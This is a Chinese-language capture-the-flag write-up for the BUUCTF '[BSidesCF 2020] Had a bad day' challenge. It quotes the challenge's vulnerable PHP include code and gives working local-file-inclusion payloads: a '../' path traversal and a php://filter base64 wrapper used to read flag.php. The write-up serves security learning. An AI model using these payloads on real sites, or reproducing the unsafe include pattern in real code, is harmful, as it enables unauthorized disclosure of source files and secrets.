BUUCTF:[BSidesCF 2020]Had a bad day
BUUCTF:[BSidesCF 2020]Had a bad day
可能存在SQL注入或者文件包含,在我尝试读取index.php源码的时候出现了报错信息
![BUUCTF:[BSidesCF 2020]Had a bad day_第1张图片](http://img.e-com-net.com/image/info8/7f07cf08b741422cb06c858db79bb21c.jpg)
的确是文件包含,但是有index.php却读取错误,报错显示无法打开流:操作失败在后面测试的时候,发现除掉后缀即可读取到源码
![BUUCTF:[BSidesCF 2020]Had a bad day_第2张图片](http://img.e-com-net.com/image/info8/df0470713833485985c6ab1c066625e5.jpg)
base64解码读取源码
$file = $_GET['category'];
if(isset($file))
{
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
include ($file . '.php');
}
else{
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>
传入的category需要有woofers,meowers,index才能包含传入以传入名为文件名的文件,我们要想办法包含flag.php
尝试直接读取/index.php?category=woofers/../flag
![BUUCTF:[BSidesCF 2020]Had a bad day_第3张图片](http://img.e-com-net.com/image/info8/5075cdf7de9145f1829976b7405e77d7.jpg)
出现了别的内容,包含成功了flag.php,但是这里也说了flag需要读取
利用php://filter伪协议可以套一层协议读取flag.php
/index.php?category=php://filter/convert.base64-encode/index/resource=flag
套一个字符index符合条件并且传入flag,读取flag.php
![BUUCTF:[BSidesCF 2020]Had a bad day_第4张图片](http://img.e-com-net.com/image/info8/97bafb3331824223941cf161ea06de0b.jpg)
![BUUCTF:[BSidesCF 2020]Had a bad day_第5张图片](http://img.e-com-net.com/image/info8/6294a399ef8a4b40b67edccb4b6a3047.jpg)